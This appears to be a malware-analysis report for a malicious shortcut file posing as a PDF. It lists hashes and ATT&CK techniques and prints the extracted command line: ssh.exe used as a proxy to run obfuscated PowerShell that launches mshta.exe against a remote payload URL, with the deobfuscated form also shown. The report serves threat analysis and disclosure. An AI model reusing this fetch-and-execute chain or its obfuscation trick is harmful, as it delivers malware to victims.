Malicious
Malicious

Instruction_695-18121-002_Rev.PDF.lnk.bin

LNK File
|
MD5: a3cf7c78d143162733c64741467b5b90
|
Size: 2.42 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:ssh.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
a3cf7c78d143162733c64741467b5b90
Sha1
2e46ae7501bf5921802c4e122fea038332d61741
Sha256
39fcf6143a801de8acba009ef69ac4f7b533d8e1b91337547ca578f2b7117534
Sha384
5ac07dcbe4cecd886497d07e483347e9cdc57b9354ee38911a51d2a55000ffa6611a607af21bc54beb384f0d4a53670d
Sha512
f85b1573f0005bc8b476a487b7d8ee87f6ebf66a2fecd8221b51d6e1b1ea9da5333ea932297094ab611eb073422f61baf57711f021d5b38d31fbdd6e6b366b1e
SSDeep
24:8lj/BF//Z/Udt1v+/+GnWbUk9r9AAlnE3ek489+dd79dsHhWUIeFIU:81LZwGnaUk9Jm3ekJ9+dJ9Z5W
TLSH
E04165046BEA072DF3B36F729876A660B43B7C45EEA1DB0E0043418C1436A24D4B5F77
File Structure
Instruction_695-18121-002_Rev.PDF.lnk.bin
LNK
Malicious
LOLBin
LOLBin:ssh.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

ssh.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" .
Deobfuscated PowerShell

"mshta.exe https://berb.fitnessclub-filmfanatics.com/z.mp4" " ."
Instruction_695-18121-002_Rev.PDF.lnk.bin (2.42 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙